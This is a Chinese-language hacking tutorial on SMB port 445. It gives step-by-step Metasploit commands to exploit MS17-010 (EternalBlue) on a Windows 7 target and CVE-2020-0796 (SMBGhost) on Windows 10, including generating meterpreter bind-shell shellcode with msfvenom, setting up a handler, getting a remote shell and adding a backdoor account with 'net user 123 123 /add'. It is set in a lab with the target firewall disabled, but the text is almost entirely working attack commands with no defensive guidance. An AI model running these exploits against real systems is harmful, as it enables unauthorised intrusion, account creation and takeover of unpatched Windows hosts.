445端口用来访问共享文件夹,445端口之所以危险,是因为厂商默认开放。
靶机:win7系统 IP:10.0.0.199 提前关闭靶机防火墙
一、MS17-010 永恒之蓝
MS微软,17年,10号漏洞。即新闻上报道的比特币勒索病毒。
1.进入MSF控制台:msfconsole
2.找到要利用的漏洞输入编号(search命令):search ms17-010
3.查看组件列表,选择要利用的攻击项(use命令):use 0
4.以为此处提示需要配置Payload,所以按照提示,Tab键一次是补全,两次是出来配置菜单。
配置攻击payload: set payload windows/x64/meterpreter/(两次tab)
(此处Payload设置为tcp的反向连接)
5.查看模块配置信息(带Yes的是需要配置的):命令:show options
查看能攻击哪些系统命令:info
需要配置的内容:本地主机IP:LHOST,攻击的靶机IP:RHOSTS。
5.配置(set命令):
set rhosts 10.0.0.199
返回上级:back
6.开始攻击(exploit命令): exploit
7.攻击成功后提示建立会话。
“?”可查看攻击项目
例:shell命令进入对方命令行。
此时可在入侵界面操作命令:如创建用户 net user 123 123 /add
同时win7靶机上显示创建用户成功。
二、CVE-2020-0796 永恒之蓝2.0
基于SMBv3的漏洞,Windows 8和Windows Server 2012-Windows 10 最新版全部中招,属于系统级漏洞利用这一漏洞会使系统遭受‘蠕虫型’攻击,这意味着很容易从一个受害者感染另一个受害者,一开机就感染。提权后可以做任意操作,例如加密你的文件勒索你。比如说像 EternalBlue 1.0(永恒之蓝 1.0)一样,加密文件,对你进行勒索虚拟货币。
1.准备
靶机:win10 IP:10.0.0.171
2.攻击
下载插件
将插件传入kali系统mnt文件夹下
在kali主机输入命令:python3 scanner.py 10.0.0.171
表示Win10中存在该漏洞。
下载另一个插件
将插件传入kali的mnt文件夹下
在kali上输入命令:python3 CVE-2020-0796.py 10.0.0.171
结果出现蓝屏
3.第三个工具
(1)msfvenom生成正向连接木马(只支持正向连接,不支持反向)
(有关msfvenom详细使用可参考https://www.jianshu.com/p/dee2b171a0a0)
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python
用生成的shellcode将exploit.py中的这一部分替换掉(buf后的字符串,保留USER_PAYLOAD不变)
(2)打开kali另一个xshell界面,在msfconsole下:开启msf监听
use exploit/multi/handler
因为是反向shell,所以改为正向
set payload windows/x64/meterpreter/bind_tcp
set lport 4444 //监听端口
set rhost 10.0.0.171 //目标主机
(3)运行exploit.py脚本,反弹shell。切换回第一个xshell界面。运行第一步修改好的脚本
此时得到了shell
如执行增加用户命令:
net user 123 123 /add
此时win10增加了一个123用户(密码123)。
三、MS08-067 网络服务器攻击
同理,不再赘述。